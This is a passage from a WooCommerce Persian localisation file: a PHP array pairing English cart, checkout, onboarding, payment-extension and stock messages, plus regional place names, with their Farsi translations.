totals.'=>'ستون حاوی مجموع سبد خرید.','block titleCart Totals'=>'جمع سبد','block titleCart Line Items'=>'سطر موارد سبد خرید','block descriptionColumn containing cart items.'=>'ستون حاوی موارد سبد خرید.','block descriptionShow customers a summary of their order.'=>'به مشتریان خلاصه‌ای از سفارششان نمایش می‌دهد.','block titleExpress Checkout'=>'پرداخت سریع','Sorry, this order requires a shipping option.'=>'با عرض پوزش، این سفارش به گزینۀ حمل و نقل نیاز دارد.','block descriptionBlock containing current line items in Cart.'=>'بلوک حاوی موارد خط فعلی در سبد خرید.','Task list ID does not exist'=>'شناسۀ لیست وظیفه موجود نیست','Task list ID already exists'=>'شناسۀ لیست وظیفه از قبل موجود است','Sorry, you are not allowed to hide task lists.'=>'متاسفانه شما مجاز نیستید وظایف(کارها) را ویرایش کنید.','Sorry, that task list was not found'=>'با عرض پوزش، لیست وظایف(کارها) پیدا نشد','Reach more shoppers and drive sales for your store. Integrate with Google to list your products for free and launch paid ad campaigns.'=>'به خریداران بیشتری دسترسی پیدا کنید و فروش را برای فروشگاه خود افزایش دهید. با گوگل ادغام شوید تا محصولات خود را به صورت رایگان فهرست کنید و کمپین های تبلیغاتی پولی راه اندازی کنید.','The Eway extension for WooCommerce allows you to take credit card payments directly on your store without redirecting your customers to a third party site to make payment.'=>'افزونه Eway برای ووکامرس به شما این امکان را می دهد که پرداخت های کارت اعتباری را مستقیماً در فروشگاه خود بدون هدایت مشتریان خود به سایت شخص ثالث برای پرداخت انجام دهید.','block titleEmpty Cart'=>'سبد خرید خالی','If this is a default attribute'=>'اگر این یک ویژگی پیشفرض است','Platform to track.'=>'پلتفرم برای رهگیری.','Platform version to track.'=>'نسخۀ سکو برای ردیابی.','Sorry, you post telemetry data.'=>'با عرض پوزش، شما داده‌های دورسنجی را ارسال می‌کنید.','Mini-Cart'=>'سبد خرید کوچک','Returns number of products with each stock status.'=>'تعداد محصولات را در هر وضعیت انبار نشان بده.','If true, calculates stock counts for products in the collection.'=>'اگر درست باشد، تعداد موجودی محصولات موجود در مجموعه را محاسبه می کند.','Time period to snooze the task.'=>'دوره زمانی برای به تعویق انداختن کار.','Store email address.'=>'آدرس ایمیل فروشگاه.','Sorry, no dismissable task with that ID was found.'=>'متاسفانه کار غیرواجبی با آن شناسه پیدا نشد.','Optional parameter to query specific task list.'=>'پارامتر اختیاری برای پرس و جو لیست وظایف خاص.','Whether to consider GMT post dates when limiting response by published or modified date.'=>'آیا برای محدود کردن پاسخ بر اساس تاریخ انتشار یا تغییر، تاریخ پست GMT را در نظر بگیرید یا خیر.','Limit response to resources modified before a given ISO8601 compliant date.'=>'محدود کردن پاسخ به منابعی که قبل از تاریخ انطباق با ISO8601 اصلاح شده اند.','Limit response to resources modified after a given ISO8601 compliant date.'=>'محدود کردن پاسخ به منابع اصلاح شده پس از تاریخ انطباق با ISO8601.','Whether or not this store agreed to receiving marketing contents from WooCommerce.com.'=>'آیا این فروشگاه با دریافت محتوای بازاریابی از WooCommerce.com موافقت کرده یا نه.','Sorry, no task with that ID was found.'=>'متاسفانه ! هیچ کاری برای آن شناسه پیدا نشد.','Sorry, no snoozeable task with that ID was found.'=>'متاسفانه ! هیچ کاری که قابل به تعویق انداختن باشد با آن شناسه پیدا نشد.','Sorry, you are not allowed to snooze onboarding tasks.'=>'متاسفانه ! شما اجازه به تعویق انداختن وظایف آماده‌سازی را ندارید.','Sorry, you are not allowed to retrieve onboarding tasks.'=>'متاسفانه ! شما اجازه بازیابی وظایف آماده‌سازی را ندارید.','This is where you can browse products in this store.'=>'اینجاست که می توانید محصولات این فروشگاه را مشاهده کنید.','Are you sure you want to remove the selected fees?'=>'آیا مطمئن هستید که می‌خواهید هزینه‌های انتخاب شده را حذف کنید؟','Are you sure you want to remove the selected shipping?'=>'آیا بابت حذف شیوه حمل و نقل انتخاب شده، اطمینان دارید؟','Add recommended marketing tools to reach new customers and grow your business'=>'ابزارهای بازاریابی توصیه شده را برای دستیابی به مشتریان جدید و رشد کسب و کار خود اضافه کنید','International'=>'بین‌المللی','ZIP Code'=>'کد پستی','Chernivtsi Oblast'=>'Chernivtsi Oblast','Enhance speed and security with %1$sJetpack%2$s'=>'افزایش سرعت و امنیت با %1$sجت‌پک%2$s','My Subscriptions %s'=>'اشتراک‌های من %s','Reach out to customers'=>'با مشتریان تماس بگیرید','Get automated sales tax with %1$sWooCommerce Tax%2$s'=>'با %1$sمالیات WooCommerce%2$s مالیات بر فروش خودکار دریافت کنید','Print shipping labels with %1$sWooCommerce Shipping%2$s'=>'چاپ برچسب های حمل و نقل با %1$sWooCommerce Shipping%2$s','Locations outside all other zones'=>'مکان‌های خارج از تمام مناطق دیگر','Potentially unsecured files were found in your uploads directory'=>'فایل‌های بالقوه ناامن در پوشه بارگذاری شما یافت شد','Files that may contain %1$sstore analytics%2$s reports were found in your uploads directory - we recommend assessing and deleting any such files.'=>'فایل‌هایی که ممکن است حاوی گزارش‌های %1$sstore analytics%2$s باشند در فهرست راهنمای آپلودهای شما یافت شدند - توصیه می‌کنیم چنین فایل‌هایی را ارزیابی و حذف کنید.','Billing Phone Number'=>'شماره تلفن صورتحساب','Page titleRefund and Returns Policy'=>'سیاست مرجوعی و عودت','Edit page'=>'ویرایش برگه','Enable WooCommerce Analytics'=>'فعال‌سازی تجزیه و تحلیل ووکامرس','Shipping Phone Number'=>'شماره تلفن ارسال','Enable table usage'=>'فعال کردن استفاده از جدول','These settings are not available while the lookup table regeneration is in progress.'=>'این تنظیمات در حالی که بازسازی جدول جستجو در حال انجام است در دسترس نیست.','Product attributes lookup table'=>'جدول جستجوی ویژگی‌های محصول','%1$s at %2$s %3$s'=>'%1$s در %2$s %3$s','When true, refunded items are restocked.'=>'در صورت فعال بودن، موارد بازپرداخت شده دوباره موجود می‌شوند.','Net total revenue (formatted).'=>'کل درآمد خالص (قالب بندی شده).','Extension\'s name - this will be used to ensure the data in the request is routed appropriately.'=>'نام افزودنی - این مورد برای اطمینان از مسیریابی مناسب داده‌های درخواست استفاده می‌شود.','Additional data to pass to the extension'=>'داده‌های اضافی برای انتقال به افزودنی','Select a product to regenerate the data for, or leave empty for a full table regeneration:'=>'محصولی را برای بازسازی داده‌ها انتخاب کنید یا برای بازسازی کامل جدول خالی بگذارید:','N. Revenue (formatted)'=>'کل درآمد خالص (قالب بندی شده).','Page slugrefund_returns'=>'بازپرداخت_بازگشتی','Use the product attributes lookup table for catalog filtering.'=>'از جدول جستجوی ویژگی‌های محصول برای فیلتر کاتالوگ استفاده کنید.','We have created a sample draft Refund and Returns Policy page for you. Please have a look and update it to fit your store.'=>'ما یک نمونه پیش‌نویس صفحه سیاست بازپرداخت و بازگشت برای شما ایجاد کرده‌ایم. لطفا نگاه کنید و آن را به‌روز کنید تا متناسب با فروشگاه شما باشد.','Update the table directly upon product changes, instead of scheduling a deferred update.'=>'به جای زمان‌بندی بروز رسانی به تعویق افتاده، جدول را مستقیماً با تغییرات محصول به‌روز کنید.','Direct updates'=>'بروز رسانی‌های مستقیم','Setup a Refund and Returns Policy page to boost your store\'s credibility.'=>'برای افزایش اعتبار فروشگاه خود، صفحه سیاست بازپرداخت و بازگشت را تنظیم کنید.','%1$s could not be served using the Force Download method. A redirect will be used instead.'=>'%1$s با استفاده از روش دانلود اجباری قابل ارائه نیست. به جای آن از یک تغییر مسیر استفاده می‌شود.','%1$s could not be served using the X-Accel-Redirect/X-Sendfile method. A Force Download will be used instead.'=>'%1$s با استفاده از روش X-Accel-Redirect/X-Sendfile قابل ارائه نیست. به جای آن از دانلود اجباری استفاده خواهد شد.','Limit result set to products that are low or out of stock. (Deprecated)'=>'نتیجه را محدود به محصولاتی کنید که کم یا موجود نیستند. (منسوخ)','If the "Force Downloads" or "X-Accel-Redirect/X-Sendfile" download method is selected but does not work, the system will use the "Redirect" method as a last resort. See this guide for more details.'=>'اگر روش بارگیری «دانلودهای اجباری» یا «X-Accel-Redirect/X-Sendfile» انتخاب شده باشد اما کارساز نباشد، سیستم از آخرین روش «تغییر مسیر» استفاده خواهد کرد. برای جزئیات بیشتر این راهنما را مشاهده کنید.','Allow using redirect mode (insecure) as a last resort'=>'اجازۀ استفاده از حالت تغییر مسیر (ناامن) به عنوان آخرین چاره','Set your store location and where you\'ll ship to.'=>'مکان فروشگاه خود و اینکه به کجا ارسال می کنید را مشخص کنید.','You\'re only one step away from getting paid. Verify your business details to start managing transactions with WooPayments.'=>'شما تنها یک قدم با کسب درآمد فاصله دارید. برای شروع مدیریت تراکنش‌ها با WooPayments، جزئیات کسب و کار خود را تأیید کنید.','Choose payment providers and enable payment methods at checkout.'=>'ارائه دهندگان پرداخت را انتخاب کرده و روش‌های پرداخت را در هنگام پرداخت فعال کنید.','Set your store location and configure tax rate settings.'=>'مکان فروشگاه خود و تنظیمات نرخ مالیات را پیکربندی کنید.','Grow your store'=>'فروشگاه خود را رشد دهید','Start by adding the first product to your store. You can add your products manually, via CSV, or import them from another service.'=>'با افزودن اولین محصول به فروشگاه خود شروع کنید. می‌توانید محصولات خود را به صورت دستی، از طریق فایل CSV اضافه کنید یا آنها را از سرویس دیگری وارد کنید.','Your store address is required to set the origin country for shipping, currencies, and payment options.'=>'آدرس فروشگاه شما برای تعیین کشور مبدا برای حمل و نقل، ارزها و گزینه‌های پرداخت لازم است.','Get backups'=>'پشتیبان گیری کنید','Protect your WooCommerce Store with Jetpack Backup.'=>'از فروشگاه ووکامرس خود با پشتیبان‌گیر جت‌پک محافظت کنید.','Store downtime means lost sales. One-click restores get you back online quickly if something goes wrong.'=>'تعطیلی فروشگاه به معنای از دست دادن فروش است. اگر مشکلی پیش بیاید، با یک کلیک بازیابی می‌شود.','Notes are unavailable because the "admin-note" data store cannot be loaded.'=>'یادداشت‌ها در دسترس نیستند زیرا ذخیره داده «یادداشت مدیریت» بارگیری نمی‌شود.','The rate at which tax is applied.'=>'نرخ که مالیات اعمال می شود.','Mollie'=>'Mollie','The Payfast extension for WooCommerce enables you to accept payments by Credit Card and EFT via one of South Africa’s most popular payment gateways. No setup fees or monthly subscription costs. Selecting this extension will configure your store to use South African rands as the selected currency.'=>'افزونه Payfast برای ووکامرس شما را قادر می سازد تا از طریق یکی از محبوب ترین درگاه های پرداخت آفریقای جنوبی، پرداخت با کارت اعتباری و EFT را بپذیرید. بدون هزینه راه اندازی یا هزینه اشتراک ماهانه. با انتخاب این افزونه، فروشگاه شما برای استفاده از راند آفریقای جنوبی به عنوان ارز انتخابی پیکربندی می‌شود.','Source of note.'=>'منبع یادداشت.','Recently Viewed Products list'=>'فهرست محصولات مشاهده‌شدۀ اخیر','Change status to cancelled'=>'تغییر وضعیت به لغو شده','Data store:'=>'ذخیره داده‌ها:','This section shows details of Action Scheduler.'=>'این بخش جزئیات برنامه زمان‌بندی عملکرد را نشان می‌دهد.','Download %d ID'=>'بارگیری %d شناسه','Products sold'=>'محصولات فروخته شده','Products by Rating list'=>'محصولات بر اساس لیست امتیاز','Variations Sold'=>'متغیر فروخته‌شده','Number of variation items sold.'=>'تعداد موارد تغییر فروخته‌شده.','Number of product items sold.'=>'تعداد محصولات فروخته‌شده.','Things to do next'=>'کارهای بعدی','Manage transactions without leaving your WordPress Dashboard. Only with WooPayments.'=>'تراکنش‌ها را بدون خروج از پیشخوان وردپرس خود مدیریت کنید. فقط با WooPayments.','How easy was it to add a product tag?'=>'افزودن برچسب محصول چقدر آسان بود؟','Product Link'=>'پیوند محصول','Product Category Link'=>'لینک دسته‌بندی محصول','A link to a product tag.'=>'یک پیوند به یک برچسب محصول.','A link to a product.'=>'یک پیوند به یک محصول.','Product Tag Link'=>'پیوند برچسب محصول','A link to a product category.'=>'یک پیوند به یک دسته محصول.','Invalid path provided.'=>'مسیر نامعتبر ارائه شده است.','Create and send purchase follow-up emails, newsletters, and promotional campaigns straight from your dashboard.'=>'ایمیل‌های پیگیری خرید، خبرنامه‌ها و کمپین‌های تبلیغاتی را مستقیماً از داشبورد خود ایجاد و ارسال کنید.','To ensure your store’s notifications arrive in your and your customers’ inboxes, we recommend connecting your email address to your domain and setting up a dedicated SMTP server. If something doesn’t seem to be sending correctly, install the WP Mail Logging Plugin or check the Email FAQ page.'=>'برای اطمینان از اینکه اعلان‌های فروشگاه شما به صندوق ایمیل شما و مشتریانتان می‌رسد، توصیه می‌کنیم آدرس ایمیل خود را به دامنه خود متصل کرده و یک سرور SMTP اختصاصی راه‌اندازی کنید. اگر به نظر می‌رسد چیزی به درستی ارسال نمی‌شود، افزونه WP Mail Logging را نصب کنید یا صفحه پرسش‌های متداول ایمیل را بررسی کنید.','Capital'=>'پایتخت','Regenerate the product attributes lookup table'=>'بازسازی جدول جستجوی ویژگی‌های محصول','Filling in progress (%d)'=>'در حال تکمیل (%d)','Product attributes lookup table data is regenerating'=>'داده‌های جدول جستجوی ویژگی‌های محصول در حال بازسازی است','This tool will regenerate the product attributes lookup table data from existing product(s) data. This process may take a while.'=>'این ابزار داده‌های جدول جستجوی ویژگی‌های محصول را از داده‌های محصول(ها) موجود بازسازی می کند. این روند ممکن است مدتی طول بکشد.','Delta Amacuro'=>'Delta Amacuro','Federal Dependencies'=>'Federal Dependencies','Zulia'=>'Zulia','Yaracuy'=>'Yaracuy','Trujillo'=>'Trujillo','Táchira'=>'Táchira','Sucre'=>'Sucre','Portuguesa'=>'Portuguesa','Nueva Esparta'=>'Nueva Esparta','Monagas'=>'Monagas','Miranda'=>'Miranda','Mérida'=>'Mérida','Lara'=>'Lara','Guárico'=>'Guárico','Falcón'=>'Falcón','Cojedes'=>'Cojedes','Carabobo'=>'Carabobo','Bolívar'=>'Bolívar','Barinas'=>'Barinas','Aragua'=>'Aragua','Apure'=>'Apure','Anzoátegui'=>'Anzoátegui','MailPoet'=>'میل‌پوئت','Paystack helps African merchants accept one-time and recurring payments online with a modern, safe, and secure payment gateway.'=>'Paystack به بازرگانان آفریقایی کمک می کند تا با یک درگاه پرداخت مدرن، ایمن و مطمئن، پرداخت های یک بار و تکراری را به صورت آنلاین بپذیرند.','How easy was it to add a product attribute?'=>'اضافه کردن ویژگی محصول چقدر آسان بود؟','How easy was it to add product category?'=>'افزودن دسته محصول چقدر آسان بود؟','How easy was it to use search?'=>'استفاده از جستجو چقدر آسان بود؟','%s connected successfully'=>'%s با موفقیت متصل شد','Paystack'=>'پراخت های انباشته شده','Hi there,'=>'درود،','%s (optional)'=>'%s (اختیاری)','Enable PayU’s exclusive plugin for WooCommerce to start accepting payments in 100+ payment methods available in India including credit cards, debit cards, UPI, & more!'=>'افزونه انحصاری PayU را برای ووکامرس فعال کنید تا پرداخت‌ها را با بیش از 100 روش پرداخت موجود در هند از جمله کارت‌های اعتباری، کارت‌های نقدی، UPI و موارد دیگر آغاز کنید!','PayU for WooCommerce'=>'PayU برای ووکامرس','Get ready to start selling'=>'آیا برای شروع فروش آماده‌اید','%1$s and %2$s'=>'%1$s و %2$s','There was an error with an item in your cart.'=>'ایرادی در یکی از موارد سبد خریدتان وجود دارد.','There are not enough %s in stock. Please reduce the quantities in your cart.'=>'«%s» موجودی کافی ندارند. لطفا تعداد آنها را در سبد خریدتان کاهش دهید.','There is not enough %s in stock. Please reduce the quantity in your cart.'=>'«%s» موجودی کافی ندارد. لطفا تعداد آن را در سبد خریدتان کاهش دهید.','Block name is required.'=>'نام بلوک الزامی است.','Integration "%s" is not registered.'=>'ادغام "%s" ثبت نشده است.','"%s" is already registered.'=>'«%s» قبلاً ثبت شده است.','Integration registry requires an identifier.'=>'رجیستری یکپارچه‌سازی به یک شناسه نیاز دارد.','There are too many %s in the cart. Only 1 of each can be purchased. Please reduce the quantities in your cart.'=>'تعداد زیادی «%s» در سبد خرید شما وجود دارد. فقط یکی از هر کدام قابل خریداری است. لطفا تعداد را در سبد خریدتان کاهش دهید.','There are too many %s in the cart. Only 1 can be purchased. Please reduce the quantity in your cart.'=>'تعداد زیادی «%s» در سبد خرید شما وجود دارند. فقط یکی از هر کدام قابل خریداری است. لطفا تعداد را در سبد خریدتان کاهش دهید.','%s cannot be purchased. Please remove them from your cart.'=>'امکان خرید «%s» وجود ندارد. لطفا آن را از سبد خریدتان حذف کنید.','%s cannot be purchased. Please remove it from your cart.'=>'امکان خرید «%s» وجود ندارد. لطفا آن را از سبد خریدتان حذف کنید.','%s are out of stock and cannot be purchased. Please remove them from your cart.'=>'%s ناموجودند و امکان خریداری ندارند. لطفا از سبد خریدتان حذفشان کنید.','%s is out of stock and cannot be purchased. Please remove it from your cart.'=>'%s ناموجود است و امکان خریداری ندارد. لطفا از سبد خریدتان حذفش کنید.','Start selling'=>'فروشتان را آغاز کنید','of'=>'از','Step'=>'گام','WooCommerce Setup'=>'راه‌اندازی ووکامرس','Tax class slug is invalid'=>'نامک کلاس مالیات معتبر نیست','City name, it doesn\'t support multiple values. Deprecated as of WooCommerce 5.3, \'cities\' should be used instead.'=>'نام شهر، از چندین مقدار پشتیبانی نمی کند. از ووکامرس 5.3 منسوخ شده است، به جای آن باید از «cities» استفاده شود.','Postcode/ZIP, it doesn\'t support multiple values. Deprecated as of WooCommerce 5.3, \'postcodes\' should be used instead.'=>'کدپستی، از چندین مقدار پشتیبانی نمی کند. از ووکامرس 5.3 منسوخ شده است، به جای آن باید از «postcodes» استفاده شود.','List of city names. Introduced in WooCommerce 5.3.'=>'لیست نام شهرها در ووکامرس 5.3 معرفی شده است.','List of postcodes / ZIPs. Introduced in WooCommerce 5.3.'=>'لیست کدهای پستی در ووکامرس 5.3 معرفی شده است.','Amount that will be refunded for this tax.'=>'مبلغی که بابت این مالیات مسترد خواهد شد.','Amount that will be refunded for this line item (excluding taxes).'=>'مبلغی که برای این مورد مسترد می شود (بدون مالیات).','Coupon item ID is readonly.'=>'شناسه کدتخفیف قابل ویرایش نیست.','You\'re almost there! Once you complete store setup you can start receiving orders.'=>'تقریباً تمام است! با راه‌اندازی فروشگاه، می توانید سفارشات خود را دریافت کنید.','Low Stock amount for the variation.'=>'حداقل تعداد موجودی برای این متغیر.','Limit result set to resources assigned to a specific parent. Applies to hierarchical taxonomies only.'=>'مجموعه نتایج را به منابع اختصاص داده شده به یک والدین خاص محدود کنید. فقط برای طبقه بندی های سلسله مراتبی اعمال می شود.','Offset the result set by a specific number of items. Applies to hierarchical taxonomies only.'=>'نتیجه تنظیم شده توسط تعداد خاصی از موارد را جبران کنید. فقط برای طبقه بندی های سلسله مراتبی اعمال می شود.','Additional tax class "%1$s" couldn\'t be saved. %2$s.'=>'کلاس مالیاتی اضافی "%1$s" ذخیره نشد. %2$s.','Low Stock amount for the product.'=>'حداقل تعداد موجودی محصول.','Search for a page…'=>'جستجوی یک برگه ;','When variation stock reaches this amount you will be notified by email. The default value for all variations can be set in the product Inventory tab. The shop default value can be set in Settings > Products > Inventory.'=>'وقتی موجودی متغیر به این مقدار رسید، از طریق ایمیل به شما اطلاع داده می شود. مقدار پیشفرض برای هر متغیر را می توان در برگه موجودی محصول تنظیم کرد. مقدار پیشفرض فروشگاه را می توان در پیکربندی > محصولات > موجودی تنظیم کرد.','%1$s (ID: %2$s)'=>'%1$s (شناسه: %2$s)','Store-wide threshold (%d)'=>'آستانه موجودی فروشگاه (%d)','Parent product\'s threshold (%d)'=>'آستانه موجودی محصول والد (%d)','The selected product isn\'t a variation of %2$s, please choose product options by visiting %2$s.'=>'محصول انتخاب شده یک تنوع از %2$s نیست, لطفا گزینه‌های محصول را با مراجعه به %2$s انتخاب کنید.','When product stock reaches this amount you will be notified by email. It is possible to define different values for each variation individually. The shop default value can be set in Settings > Products > Inventory.'=>'وقتی موجودی محصول به این مقدار رسید، از طریق ایمیل به شما اطلاع داده می شود. مقدار پیشفرض برای هر محصول را می توان در برگه موجودی محصول تنظیم کرد. مقدار پیشفرض فروشگاه را می توان در پیکربندی > محصولات > موجودی تنظیم کرد.','PayPal Payments'=>'پرداخت‌های پی‌پال','Effortless payments by Mollie: Offer global and local payment methods, get onboarded in minutes, and supported in your language.'=>'پرداخت‌های بدون دردسر توسط Mollie: روش‌های پرداخت جهانی و محلی را ارائه دهید، در عرض چند دقیقه سوار شوید و به زبان شما پشتیبانی شود.','%s is required'=>'%s اجباری است','shipping address'=>'آدرس گیرنده','List of cart fees.'=>'فهرست هزینه‌های سبد خرید.','The provided postcode / ZIP is not valid'=>'کدپستی / ZIP ارائه‌شده نامعتبر است','Invalid country code provided. Must be one of: %s'=>'کد کشور ارائه‌شده نامعتبر است. باید یکی از این موارد باشد: %s','Total tax amount for this fee.'=>'مجموع بهای مالیات برای این هزینه.','Total amount for this fee.'=>'مجموع بهای این هزینه.','billing address'=>'نشانی صورتحساب','The provided phone number is not valid'=>'شماره تلفن ارائه شده معتبر نیست','The provided email address is not valid'=>'نشانی ایمیل ارائه شده معتبر نیست','There was a problem with the provided %s:'=>'مشکلی در %s ارائه شده وجود داشت:','Optionally, how the metadata value should be displayed to the user.'=>'اختیاری، نحوه نمایش مقادیر فراداده به کاربر.','List of required payment gateway features to process the order.'=>'لیست ویژگی‌های درگاه پرداخت مورد نیاز برای پردازش سفارش.','Fee total amounts provided using the smallest unit of the currency.'=>'کل مبالغ ارائه شده با استفاده از کوچکترین واحد پول.','The provided state (%1$s) is not valid. Must be one of: %2$s'=>'حالت ارائه‌شده (%1$s) نامعتبر است. باید یکی از این موارد باشد: %2$s','Add manually'=>'افزودن','Metadata related to the item'=>'فرادادهٔ مربوط به مورد مورد','Value of the metadata.'=>'مقدار فراداده.','Name of the metadata.'=>'نام فراداده.','Sorry, we do not allow orders from the provided country (%s)'=>'متاسفانه ! ما سفارشات از کشور مشخص شده را مجاز نمی دانیم (%s)','The provided email address (%s) is not valid—please provide a valid email address'=>'نشانی ایمیل (%s) ارائه شده معتبر نیست—لطفا یک نشانی ایمیل معتبر ارائه کنید','Script with handle %s had a dependency on itself which has been removed. This is an indicator that your JS code has a circular dependency that can cause bugs.'=>'اسکریپت با دسته %s یک وابستگی به خودش داشت که حذف شد. این نشانگر این است که کد JS شما وابستگی دایره ای دارد که می تواند باعث ایجاد اشکال شود.','Sorry, we do not ship orders to the provided country (%s)'=>'متاسفانه ! ما سفارشات را به کشور مشخص نشده ارسال نمی کنیم (%s)','A valid email address is required'=>'یک نشانی ایمیل معتبر لازم است','Sorry, creating the product with template failed.'=>'با عرض پوزش، ایجاد محصول با الگو انجام نشد.','Extended task List'=>'لیست وظایف گسترده','How to customize your product catalog'=>'نحوۀ سفارشی‌سازی فهرست محصول','Product template name.'=>'نام قالب محصول.','You want your product catalog and images to look great and align with your brand. This guide will give you all the tips you need to get your products looking great in your store.'=>'شما می خواهید کاتالوگ محصولات و تصاویر شما عالی به نظر برسند و با نام تجاری شما هماهنگ باشند. این راهنما تمام نکاتی را که برای به نمایش گذاشتن محصولاتتان در فروشگاهتان نیاز دارید به شما ارائه می دهد.','Zacapa'=>'Zacapa','Totonicapán'=>'Totonicapán','Santa Rosa'=>'Santa Rosa','San Marcos'=>'San Marcos','Sacatepéquez'=>'Sacatepéquez','Retalhuleu'=>'Retalhuleu','Quiché'=>'Quiché','Quetzaltenango'=>'Quetzaltenango','Petén'=>'Petén','Jutiapa'=>'Jutiapa','Jalapa'=>'Jalapa','Izabal'=>'Izabal','Huehuetenango'=>'Huehuetenango','Escuintla'=>'Escuintla','El Progreso'=>'El Progreso','Chiquimula'=>'Chiquimula','Chimaltenango'=>'Chimaltenango','Suchitepéquez'=>'Suchitepéquez','Sololá'=>'Sololá','Baja Verapaz'=>'Baja Verapaz','Alta Verapaz'=>'Alta Verapaz','Generated at'=>'تولید شده در','Status report information'=>'اطلاعات گزارش وضعیت','\'%s\' is not a valid country code.'=>'\'%s\' یک کد کشور معتبر نیست.','Page does not contain the %1$s shortcode or the %2$s block.'=>'برگه حاوی کد کوتاه %1$s یا بلوک %2$s نیست.','This section shows information about this status report.'=>'این بخش، اطلاعات مربوط به این گزارش وضعیت را نشان می‌دهد.','Get the basics'=>'اصول اولیه را دریافت کنید','Odisha'=>'Odisha','Santo Domingo'=>'Santo Domingo','San José de Ocoa'=>'San José de Ocoa','Hato Mayor'=>'Hato Mayor','Monte Plata'=>'Monte Plata','Monseñor Nouel'=>'Monseñor Nouel','Valverde'=>'Valverde','Santiago Rodríguez'=>'Santiago Rodríguez','Santiago'=>'Santiago','Sánchez Ramírez'=>'Sánchez Ramírez','San Pedro de Macorís'=>'San Pedro de Macorís','San Cristóbal'=>'San Cristóbal','Samaná'=>'Samaná','Hermanas Mirabal'=>'Hermanas Mirabal','Barahona'=>'Barahona','Baoruco'=>'Baoruco','Azua'=>'Azua','Distrito Nacional'=>'Distrito Nacional','Puerto Plata'=>'Puerto Plata','Peravia'=>'Peravia','Pedernales'=>'Pedernales','Monte Cristi'=>'Monte Cristi','María Trinidad Sánchez'=>'María Trinidad Sánchez','La Vega'=>'La Vega','Duarte'=>'Duarte','Dajabón'=>'Dajabón','La Romana'=>'La Romana','La Altagracia'=>'La Altagracia','Independencia'=>'Independencia','Espaillat'=>'Espaillat','El Seibo'=>'El Seibo','Elías Piña'=>'Elías Piña','You\'re invited to share your experience'=>'شما برای اشتراک گذاری تجربه‌تان دعوت شدید','Search by similar attribute name.'=>'جستجو بر اساس نام ویژگی مشابه.','Slug identifier for the resource.'=>'نامک منحصر به فرد برای منبع.','I don\'t know how to get a date from a %s'=>'من نمی دانم چگونه از %s تاریخ بگیرم','With the release of WooCommerce 4.0, these reports are being replaced. There is a new and better Analytics section available for users running WordPress 5.3+. Head on over to the WooCommerce Analytics or learn more about the new experience in the WooCommerce Analytics documentation.'=>'با انتشار ووکامرس ۴.۰، این گزارش‌ها جایگزین شدند. بخش تجزیه و تحلیل جدید و بهتری برای کاربران در حال اجرا با وردپرس ۵.۳ و جدیدتر در دسترس است. به تجزیه و تحلیل ووکامرس بروید یا درباره تجربه جدید در مستندات تجزیه و تحلیل ووکامرس نگاهی بیندازید.','No product attribute with that slug was found.'=>'هیچ ویژگی محصولی با این نامک پیدا نشد.','%1$s %2$sUpdate WordPress to enable the new navigation%3$s'=>'%1$s %2$sوردپرس را بروز رسانی کنید تا پیمایش جدید%3$s را فعال کنید','Department'=>'دپارتمان','Are you sure you\'re ready?'=>'آیا مطمئنی آماده ای؟','We strongly recommend creating a backup of your site before updating.'=>'ما به شدت توصیه می‌کنیم قبل از بروز رسانی از سایت خود نسخه پشتیبان تهیه کنید.','Send'=>'ارسال','Razorpay'=>'ریزور پی','Whether the product is visible in the catalog'=>'این که آیا محصول در کاتالوگ قابل مشاهده است','The official Razorpay extension for WooCommerce allows you to accept credit cards, debit cards, netbanking, wallet, and UPI payments.'=>'افزونه رسمی Razorpay برای WooCommerce به شما امکان می‌دهد کارت‌های اعتباری، کارت‌های نقدی، Netbanking، کیف پول و پرداخت‌های UPI را بپذیرید.','Extension data registered by %s'=>'داده های برنامه افزودنی ثبت شده توسط %s','Total tax on shipping. If shipping has not been calculated, a null response will be sent.'=>'کل مالیات بر حمل و نقل اگر حمل و نقل محاسبه نشده باشد، پاسخ پوچ ارسال خواهد شد.','Total price of shipping. If shipping has not been calculated, a null response will be sent.'=>'قیمت کل حمل و نقل اگر حمل و نقل محاسبه نشده باشد، پاسخ پوچ ارسال خواهد شد.','True if the cart meets the criteria for showing shipping costs, and rates have been calculated and included in the totals.'=>'درست است اگر سبد خرید معیارهای نشان دادن هزینه های حمل و نقل را داشته باشد و نرخ ها محاسبه و در مجموع لحاظ شده باشد.','Thank you for your feedback!'=>'از بازخوردتان سپاسگزاریم!','Ladakh'=>'Ladakh','Current set billing address for the customer.'=>'نشانی صورتحساب تنظیم شده فعلی برای مشتری.','The discount type for the coupon (e.g. percentage or fixed amount)'=>'نوع تخفیف برای کوپن (به عنوان مثال درصد یا مبلغ ثابت)','The date the last order for this product was placed, in the site\'s timezone.'=>'تاریخ ثبت آخرین سفارش برای این محصول، در منطقه زمانی سایت.','Limit result set to orders that have the specified customer_type'=>'مجموعه نتایج را به سفارشاتی محدود کنید که دارای نوع مشتری مشخص شده هستند','Alias for customer_type (deprecated).'=>'نام مستعار برای customer_type (منسوخ شده)','The coupon\'s unique code.'=>'کد یکتای کدتخفیف.','Unable to create order'=>'ایجاد سفارش مقدور نمیباشد','How easy was it to update your settings?'=>'بروز رسانی تنظیمات چقدر آسان بود؟','How easy was it to update an order?'=>'بروز رسانی یک سفارش چقدر آسان بود؟','Usage limit for coupon "%1$s" has been reached. If you were using this coupon just now but your order was not complete, you can retry or cancel the order by going to the my account page.'=>'محدودیت استفاده از کوپن "%1$s" به پایان رسیده است. اگر همین الان از این کوپن استفاده می‌کردید اما سفارش شما تکمیل نشده است، می‌توانید با رفتن به صفحه حساب من دوباره امتحان کنید یا سفارش را لغو کنید.','Back'=>'بازگشت','Clarendon'=>'Clarendon','Westmoreland'=>'Westmoreland','Hanover'=>'Hanover','Saint James'=>'Saint James','Trelawny'=>'Trelawny','Saint Ann'=>'Saint Ann','Saint Mary'=>'Saint Mary','Portland'=>'Portland','Saint Thomas'=>'Saint Thomas','Saint Andrew'=>'Saint Andrew','Kingston'=>'Kingston','Saint Elizabeth'=>'Saint Elizabeth','How easy was it to import products?'=>'درون‌ریزی محصولات چقدر آسان بود؟','Manage your orders on the go'=>'سفارشات خود را در حال حرکت مدیریت کنید','Look for orders, customer info, and process refunds in one click with the Woo app.'=>'با برنامه Woo به دنبال سفارشات، اطلاعات مشتری و بازپرداخت با یک کلیک باشید.','This tool will reset the cached values used in WooCommerce Analytics. If numbers still look off, try %1$sReimporting Historical Data%2$s.'=>'این ابزار مقادیر کش شده مورد استفاده در تحلیل ووکامرس را بازنشانی می کند. اگر اعداد هنوز به نظر نمی رسند، %1$sوارد کردن مجدد داده های تاریخی%2$s را امتحان کنید.','Saint Catherine'=>'Saint 